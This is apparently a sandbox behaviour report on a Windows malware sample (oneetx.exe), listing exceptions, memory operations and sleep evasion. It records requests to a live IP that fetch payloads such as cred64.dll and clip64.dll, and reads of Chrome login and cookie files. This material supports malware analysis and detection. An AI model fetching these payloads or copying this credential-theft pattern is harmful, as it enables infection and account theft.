exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x487316b
registers.esp: 2025592
registers.edi: 2025880
registers.eax: 0
registers.ebp: 2025600
registers.edx: 0
registers.ebx: 2027484
registers.esi: 44192100
registers.ecx: 43366956
1 0 0

__exception__

 stacktrace: 
0x48735ac
0x4873458
0xb4ed15
0xb4dc10
0xb4d146
0xb47cbf
0xb425cd
0xb420de
0xb405c8
0xb40094
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72482652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7249264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72492e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x725474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72547610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x725d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x725d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x725d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x725d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72b2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72ba7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72ba4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 24 30 ee 00 89 85 4c ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xb4f85e
registers.esp: 2025384
registers.edi: 2025608
registers.eax: 0
registers.ebp: 2025620
registers.edx: 15609524
registers.ebx: 2027484
registers.esi: 43129644
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
0x4873128
0x4873997
0x4873458
0xb4ed15
0xb4dc10
0xb4d146
0xb47cbf
0xb425cd
0xb420de
0xb405c8
0xb40094
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72482652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7249264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72492e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x725474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72547610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x725d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x725d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x725d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x725d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72b2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72ba7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72ba4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x487316b
registers.esp: 2025596
registers.edi: 2025908
registers.eax: 0
registers.ebp: 2025604
registers.edx: 0
registers.ebx: 2027484
registers.esi: 43129644
registers.ecx: 44801360
1 0 0

__exception__

 stacktrace: 
0x48735ac
0x4873458
0xb4ed2d
0xb4dc10
0xb4d146
0xb47cbf
0xb425cd
0xb420de
0xb405c8
0xb40094
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72482652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7249264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72492e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x725474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72547610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x725d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x725d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x725d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x725d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72b2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72ba7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72ba4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 24 30 ee 00 89 85 4c ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xb4f85e
registers.esp: 2025384
registers.edi: 2025608
registers.eax: 0
registers.ebp: 2025620
registers.edx: 15609524
registers.ebx: 2027484
registers.esi: 43129644
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
0x4873128
0x4873997
0x4873458
0xb4ed2d
0xb4dc10
0xb4d146
0xb47cbf
0xb425cd
0xb420de
0xb405c8
0xb40094
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72482652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7249264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72492e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x725474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72547610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x725d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x725d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x725d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x725d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72b2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72ba7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72ba4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x487316b
registers.esp: 2025596
registers.edi: 2025908
registers.eax: 0
registers.ebp: 2025604
registers.edx: 0
registers.ebx: 2027484
registers.esi: 43129644
registers.ecx: 46150280
1 0 0

__exception__

 stacktrace: 
0x48735ac
0x4873458
0xb4ed2d
0xb4dc10
0xb4d146
0xb47cbf
0xb425cd
0xb420de
0xb405c8
0xb40094
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72482652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7249264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72492e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x725474ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72547610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x725d1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x725d1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x725d1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x725d416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72b2f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72ba7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72ba4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 24 30 ee 00 89 85 4c ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xb4f85e
registers.esp: 2025384
registers.edi: 2025608
registers.eax: 0
registers.ebp: 2025620
registers.edx: 15609524
registers.ebx: 2027484
registers.esi: 43129644
registers.ecx: 0
1 0 0
suspicious_features POST method with no referer header, POST method with no useragent header, Connection to IP address suspicious_request POST http://77.91.124.20/store/games/index.php
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://77.91.124.20/DSC01491/foto0174.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://77.91.124.20/DSC01491/fotocr23.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://77.91.124.20/store/games/Plugins/cred64.dll
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://77.91.124.20/store/games/Plugins/clip64.dll
request POST http://77.91.124.20/store/games/index.php
request GET http://77.91.124.20/DSC01491/foto0174.exe
request GET http://77.91.124.20/DSC01491/fotocr23.exe
request GET http://77.91.124.20/store/games/Plugins/cred64.dll
request GET http://77.91.124.20/store/games/Plugins/clip64.dll
request POST http://77.91.124.20/store/games/index.php
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 2556
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73921000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2556
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73261000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2608
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73921000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2608
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72e11000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2688
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73921000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2688
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73261000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2732
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72df1000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2732
region_size: 655360
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00460000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2732
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x004c0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2732
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72de2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2732
region_size: 983040
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x025b0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2732
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02660000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2732
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72d12000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2732
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x726bb000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2732
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x726d1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2732
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x726d2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2732
region_size: 1048576
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027c0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2732
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02880000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2732
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00a52000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2732
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02661000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2732
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02662000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2732
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00a5a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2732
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00a5c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2732
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73271000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2732
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02663000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2732
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00a6c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2732
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02664000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2732
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00a8b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2732
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00a87000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2732
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x715ea000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2732
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02640000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2732
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00a85000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2732
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7325f000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2732
region_size: 28672
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02641000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2732
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00a76000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2732
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00a7a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2732
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00a77000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2732
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02648000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2732
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02649000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2732
region_size: 12288
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0264a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2732
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0264d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2732
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73111000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2888
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72d92000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2888
region_size: 1310720
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00b40000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2888
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00c40000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2888
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72cc2000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2888
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7266b000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2888
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72681000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2888
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72682000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2888
region_size: 983040
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00b40000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0
description oneetx.exe tried to sleep 120 seconds, actually delayed analysis time by 120 seconds
Time & API Arguments Status Return Repeated

GetDiskFreeSpaceW

 number_of_free_clusters: 3252637
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

 number_of_free_clusters: 3252637
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

 number_of_free_clusters: 3252222
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

 number_of_free_clusters: 3252222
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

 number_of_free_clusters: 3251903
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

 number_of_free_clusters: 3251903
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

 number_of_free_clusters: 3249842
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

 number_of_free_clusters: 3249842
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

 number_of_free_clusters: 3249427
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

 number_of_free_clusters: 3249427
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

 number_of_free_clusters: 3249268
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

 number_of_free_clusters: 3249268
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

 number_of_free_clusters: 3248554
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

 number_of_free_clusters: 3248554
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

 number_of_free_clusters: 3248139
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

 number_of_free_clusters: 3248139
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

 number_of_free_clusters: 3247820
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0

GetDiskFreeSpaceW

 number_of_free_clusters: 3247820
sectors_per_cluster: 8
bytes_per_sector: 512
root_path: \
total_number_of_clusters: 8362495
1 1 0
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State
file C:\Users\test22\AppData\Local\Temp\IXP000.TMP\d7677923.exe
file C:\Users\test22\AppData\Local\Temp\IXP007.TMP\k3172217.exe
file C:\Users\test22\AppData\Local\Temp\IXP005.TMP\y1696486.exe
file C:\Users\test22\AppData\Local\Temp\IXP000.TMP\v3703114.exe
file C:\Users\test22\AppData\Local\Temp\IXP005.TMP\n8251784.exe
file C:\Users\test22\AppData\Local\Temp\1000020051\foto0174.exe
file C:\Users\test22\AppData\Roaming\006700e5a2ab05\cred64.dll
file C:\Users\test22\AppData\Local\Temp\IXP002.TMP\i6821669.exe
file C:\Users\test22\AppData\Local\Temp\IXP002.TMP\a9556928.exe
file C:\Users\test22\AppData\Local\Temp\IXP001.TMP\v0482713.exe
file C:\Users\test22\AppData\Local\Temp\IXP003.TMP\h4892724.exe
file C:\Users\test22\AppData\Local\Temp\IXP006.TMP\y5856029.exe
file C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll
file C:\Users\test22\AppData\Local\Temp\1000021051\fotocr23.exe
file C:\Users\test22\AppData\Local\Temp\IXP003.TMP\x6228514.exe
file C:\Users\test22\AppData\Local\Temp\IXP002.TMP\x1404399.exe
